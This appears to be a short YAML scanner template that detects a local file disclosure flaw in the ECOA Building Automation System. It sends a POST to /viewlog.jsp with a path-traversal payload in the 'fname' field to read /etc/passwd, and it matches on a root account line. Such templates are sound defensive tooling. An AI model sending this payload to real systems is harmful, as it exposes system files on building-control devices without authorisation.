name:
  - "ECOA Building Automation System - Local File Disclosure"
url:
  - "/viewlog.jsp"
method:
  - "POST"
data:
  - "yr=2021&mh=6&fname=../../../../../../../../etc/passwd"
matchers:
  - Status:
      - 200
  - Regex:
      - "root:x:0:0:root:/root:/bin/sh"
      